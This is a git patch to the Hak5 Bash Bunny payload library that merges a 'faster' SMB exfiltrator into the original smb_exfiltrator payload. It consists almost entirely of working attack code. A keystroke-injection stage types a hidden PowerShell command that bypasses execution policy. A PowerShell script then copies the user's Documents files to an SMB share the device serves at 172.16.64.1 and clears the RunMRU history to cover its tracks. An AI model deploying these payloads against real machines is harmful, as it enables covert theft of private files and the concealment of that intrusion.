From 4346b86ecd42d65f5c4bf0415a8f3a7d999b2a38 Mon Sep 17 00:00:00 2001 From: Darren Kitchen Date: Fri, 7 Apr 2017 14:56:51 +1000 Subject: [PATCH] Removed old smb_exfiltrator payload and renamed faster_smb_exfiltrator Old version is now deprecated. I'll eventually merge the older technique into the existing smb_exfiltrator with execution options. --- .../faster_smb_exfiltrator/payload.txt | 93 ------------ .../library/faster_smb_exfiltrator/readme.md | 37 ----- payloads/library/smb_exfiltrator/payload.txt | 142 ++++++++---------- payloads/library/smb_exfiltrator/readme.md | 34 +++-- .../s.ps1 | 14 +- 5 files changed, 87 insertions(+), 233 deletions(-) delete mode 100644 payloads/library/faster_smb_exfiltrator/payload.txt delete mode 100644 payloads/library/faster_smb_exfiltrator/readme.md rename payloads/library/{faster_smb_exfiltrator => smb_exfiltrator}/s.ps1 (98%) diff --git a/payloads/library/faster_smb_exfiltrator/payload.txt b/payloads/library/faster_smb_exfiltrator/payload.txt deleted file mode 100644 index 76479fa..0000000 --- a/payloads/library/faster_smb_exfiltrator/payload.txt +++ /dev/null @@ -1,93 +0,0 @@ -#!/bin/bash -# -# Title: Faster SMB Exfiltrator -# Author: Hak5Darren -# Props: ImNatho, mike111b, madbuda -# Version: 1.0 -# Category: Exfiltration -# Target: Windows XP SP3+ (Powershell) -# Attackmodes: HID, Ethernet -# -# Rewrite of the original SMB Exfiltrator payload with: -# - Faster copying, using robocopy multithreaded mode -# - Faster finish, using a EXFILTRATION_COMPLETE file -# - Offload logic to target PC for accurate date/time -# - Clears tracks by default without second run dialog -# - Test-Connection handling by ICMP (no lame sleeps) -# - Hidden powershell window by default -# -# LED Status -# Red Blinking.........Failed to find dependencies -# Purple Blinking......HID Stage -# Purple...............Ethernet Stage -# Blue/Purple..........Receiving Files -# White................Moving Liberated Files -# Green................Finished -# -# OPTIONS: configured from s.ps1 - - - -######## INITIALIZATION ######## -# Check for impacket. If not found, blink fast red. -if [ ! -d /pentest/impacket/ ]; then - LED R 100 - exit 1 -fi - - - -######## SETUP ######## -# Get switch position from bunny helpers -source bunny_helpers.sh -# Make temporary loot directory -mkdir -p /loot/smb/ -# Delete any old exfiltration data -rm -rf /loot/smb/* -# Copy new powershell payload to smb share -cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/ -# Make loot directory on USB Disk -mkdir -p /root/udisk/loot/smb_exfiltrator -# Disable ICMP/echo replies so our powershell stager doesn't attempt to access the SMB share before smbserver starts (workaround since Test-NetConnection 172.16.64.1 SMB only works on powershell 4.0+ for Windows 8+) -echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all - - - -######## HID STAGE ######## -# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available -LED R B 500 -ATTACKMODE HID -QUACK GUI r -QUACK DELAY 500 -QUACK STRING "powershell -WindowStyle Hidden -Exec Bypass \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1) { \\\172.16.64.1\s\s.ps1; exit } }\"" -QUACK ENTER - - - -######## ETHERNET STAGE ######## -LED R B -ATTACKMODE RNDIS_ETHERNET -# Start the SMB Server -/pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' s /loot/smb >> /loot/smbserver.log & -# Re-enable ICMP/echo replies to trip the powershell stager -echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all -# Wait until files are done copying. -while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do LED B; sleep 0.5; LED R B; sleep 0.5; done - - - -######## CLEANUP ######## -LED R G B -# Delete EXFILTRATION_COMPLETE file -rm -rf /loot/smb/EXFILTRATION_COMPLETE -# Move files to udisk loot directory -mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator -# Clean up temporary loot directory -rm -rf /loot/smb/e/* -# Sync file system -sync; sleep 1; sync - - - -######## FINISH ######## -LED G # Trap is clean \ No newline at end of file diff --git a/payloads/library/faster_smb_exfiltrator/readme.md b/payloads/library/faster_smb_exfiltrator/readme.md deleted file mode 100644 index 34529a9..0000000 --- a/payloads/library/faster_smb_exfiltrator/readme.md +++ /dev/null @@ -1,37 +0,0 @@ -# Faster SMB Exfiltrator - -* Author: Hak5Darren -* Props: ImNatho, mike111b, madbuda -* Version: Version 1.0 -* Target: Windows XP SP3+ (Powershell) -* Category: Exfiltration -* Attackmodes: HID, Ethernet - -## Description - -Exfiltrates select files from users's documents folder via SMB. -Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME - -Rewrite of the original SMB Exfiltrator payload with: -* Faster copying, using robocopy multithreaded mode -* Faster finish, using a EXFILTRATION_COMPLETE file -* Offload logic to target PC for accurate date/time -* Clears tracks by default without second run dialog -* Test-Connection handling by ICMP (no lame sleeps) -* Hidden powershell window by default - - -## Configuration - -Configured to copy docx files by default. Change $exfil_ext in s.ps1 to desired. - -## STATUS - -| LED | Status | -| ------------------- | -------------------------------------- | -| Red (blinking) | Impacket not found in /pentest | -| Magenta (blinking) | HID Stage | -| Magenta | Ethernet Stage | -| Magenta/Blue | Receiving files | -| White | Moving liberated files to mass storage | -| Green | Finished | \ No newline at end of file diff --git a/payloads/library/smb_exfiltrator/payload.txt b/payloads/library/smb_exfiltrator/payload.txt index 850bfa8..76479fa 100644 --- a/payloads/library/smb_exfiltrator/payload.txt +++ b/payloads/library/smb_exfiltrator/payload.txt @@ -1,31 +1,34 @@ #!/bin/bash # -# Title: SMB Exfiltrator +# Title: Faster SMB Exfiltrator # Author: Hak5Darren +# Props: ImNatho, mike111b, madbuda # Version: 1.0 # Category: Exfiltration # Target: Windows XP SP3+ (Powershell) # Attackmodes: HID, Ethernet +# +# Rewrite of the original SMB Exfiltrator payload with: +# - Faster copying, using robocopy multithreaded mode +# - Faster finish, using a EXFILTRATION_COMPLETE file +# - Offload logic to target PC for accurate date/time +# - Clears tracks by default without second run dialog +# - Test-Connection handling by ICMP (no lame sleeps) +# - Hidden powershell window by default # -# -# Red Blink Fast.......Impacket not found -# Red Blink Slow.......Target did not acquire IP address -# Amber Blink Fast.....Initialization -# Amber................HID Stage -# Purple Blink Fast....Ethernet Stage -# Blue Interstitial....Receiving Files -# White................Moving loot to mass storage +# LED Status +# Red Blinking.........Failed to find dependencies +# Purple Blinking......HID Stage +# Purple...............Ethernet Stage +# Blue/Purple..........Receiving Files +# White................Moving Liberated Files # Green................Finished # -# OPTIONS -LOOTDIR=/root/udisk/loot/smb_exfiltrator -EXFILTRATE_FILES="*.pdf" -CLEARTRACKS="yes" # yes or no - -# Initialization -LED R G 100 +# OPTIONS: configured from s.ps1 + +######## INITIALIZATION ######## # Check for impacket. If not found, blink fast red. if [ ! -d /pentest/impacket/ ]; then LED R 100 @@ -33,83 +36,58 @@ if [ ! -d /pentest/impacket/ ]; then fi -# HID STAGE -# Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1. -# Once found, initiates file copy and exits -LED R G + +######## SETUP ######## +# Get switch position from bunny helpers +source bunny_helpers.sh +# Make temporary loot directory +mkdir -p /loot/smb/ +# Delete any old exfiltration data +rm -rf /loot/smb/* +# Copy new powershell payload to smb share +cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/ +# Make loot directory on USB Disk +mkdir -p /root/udisk/loot/smb_exfiltrator +# Disable ICMP/echo replies so our powershell stager doesn't attempt to access the SMB share before smbserver starts (workaround since Test-NetConnection 172.16.64.1 SMB only works on powershell 4.0+ for Windows 8+) +echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all + + + +######## HID STAGE ######## +# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available +LED R B 500 ATTACKMODE HID QUACK GUI r QUACK DELAY 500 -QUACK STRING "powershell -WindowStyle Hidden \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\"" +QUACK STRING "powershell -WindowStyle Hidden -Exec Bypass \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1) { \\\172.16.64.1\s\s.ps1; exit } }\"" QUACK ENTER -# Clear tracks? -if [ $CLEARTRACKS == "yes" ]; then - QUACK DELAY 500 - QUACK GUI r - QUACK DELAY 500 - QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" - QUACK ENTER -fi -# ETHERNET STAGE -LED R B 100 +######## ETHERNET STAGE ######## +LED R B ATTACKMODE RNDIS_ETHERNET +# Start the SMB Server +/pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' s /loot/smb >> /loot/smbserver.log & +# Re-enable ICMP/echo replies to trip the powershell stager +echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all +# Wait until files are done copying. +while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do LED B; sleep 0.5; LED R B; sleep 0.5; done -# Setup SMB server to receive loot in staging area -mkdir -p /root/loot/smb_exfiltrator/temp/ -# house cleaning -rm -rf /root/loot/smb_exfiltrator/temp/* -# Fire up SMB Server -/pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' e /root/loot/smb_exfiltrator/temp/ & - -# Source bunny_helpers.sh to get environment variables -source bunny_helpers.sh - - -# Give target a chance to start exfiltration -sleep 2 - - -# Make loot directory based on hostname (increment for multiple uses) -mkdir -p $LOOTDIR -HOST=${TARGET_HOSTNAME} -# If hostname is blank set it to "noname" -[[ -z "$HOST" ]] && HOST="noname" -COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l) -COUNT=$((COUNT+1)) -mkdir -p $LOOTDIR/$HOST-$COUNT - - -# Check target IP address. If unset, blink slow red. -if [ -z "${TARGET_IP}" ]; then - LED R 1000 - exit 1 -fi - - -# Wait until exfiltration is complete -last=0 -current=1 -while [ "$last" != "$current" ]; do - last=$current - current=$(find /root/loot/smb_exfiltrator/temp/ -exec stat -c "%Y" \{\} \; | sort -n | tail -1) - LED B - sleep 1 - LED R B 100 - sleep 9 - # Files are still being copied. Loop. - # (Issue may exist if file takes longer than 10s to copy) -done - - -# Move files from staging area to loot directory +######## CLEANUP ######## LED R G B -mv /root/loot/smb_exfiltrator/temp/* $LOOTDIR/$HOST-$COUNT +# Delete EXFILTRATION_COMPLETE file +rm -rf /loot/smb/EXFILTRATION_COMPLETE +# Move files to udisk loot directory +mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator +# Clean up temporary loot directory +rm -rf /loot/smb/e/* +# Sync file system sync; sleep 1; sync -# Trap is clean -LED G + + +######## FINISH ######## +LED G # Trap is clean \ No newline at end of file diff --git a/payloads/library/smb_exfiltrator/readme.md b/payloads/library/smb_exfiltrator/readme.md index d567888..34529a9 100644 --- a/payloads/library/smb_exfiltrator/readme.md +++ b/payloads/library/smb_exfiltrator/readme.md @@ -1,31 +1,37 @@ -# SMB Exfiltrator +# Faster SMB Exfiltrator * Author: Hak5Darren +* Props: ImNatho, mike111b, madbuda * Version: Version 1.0 * Target: Windows XP SP3+ (Powershell) * Category: Exfiltration * Attackmodes: HID, Ethernet - + ## Description Exfiltrates select files from users's documents folder via SMB. -Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME-# +Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME + +Rewrite of the original SMB Exfiltrator payload with: +* Faster copying, using robocopy multithreaded mode +* Faster finish, using a EXFILTRATION_COMPLETE file +* Offload logic to target PC for accurate date/time +* Clears tracks by default without second run dialog +* Test-Connection handling by ICMP (no lame sleeps) +* Hidden powershell window by default + ## Configuration -Configured to copy PDF files by default. Change EXFILTRATE_FILES variable to desired. +Configured to copy docx files by default. Change $exfil_ext in s.ps1 to desired. ## STATUS | LED | Status | | ------------------- | -------------------------------------- | -| Red (fast blink) | Impacket not found in /pentest | -| Red (slow blink) | Setup Failed. Target didn't obtain IP | -| Purple | HID Stage | -| Purple (fast blink) | Ethernet Stage | -| Blue (interupt) | Receiving files | -| White | Files received, moving to mass storage | -| Green | Finished | - -## Discussion -[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40509-payload-smb-exfiltrator/ "Hak5 Forum Thread") +| Red (blinking) | Impacket not found in /pentest | +| Magenta (blinking) | HID Stage | +| Magenta | Ethernet Stage | +| Magenta/Blue | Receiving files | +| White | Moving liberated files to mass storage | +| Green | Finished | \ No newline at end of file diff --git a/payloads/library/faster_smb_exfiltrator/s.ps1 b/payloads/library/smb_exfiltrator/s.ps1 similarity index 98% rename from payloads/library/faster_smb_exfiltrator/s.ps1 rename to payloads/library/smb_exfiltrator/s.ps1 index f1012b6..88a3e5a 100644 --- a/payloads/library/faster_smb_exfiltrator/s.ps1 +++ b/payloads/library/smb_exfiltrator/s.ps1 @@ -1,7 +1,7 @@ -$exfil_dir="$Env:UserProfile\Documents" -$exfil_ext="*.docx" -$loot_dir="\\172.16.64.1\s\e\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))" -mkdir $loot_dir -robocopy $exfil_dir $loot_dir $exfil_ext /S /MT /Z -New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE" -Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue +$exfil_dir="$Env:UserProfile\Documents" +$exfil_ext="*.docx" +$loot_dir="\\172.16.64.1\s\e\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))" +mkdir $loot_dir +robocopy $exfil_dir $loot_dir $exfil_ext /S /MT /Z +New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE" +Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue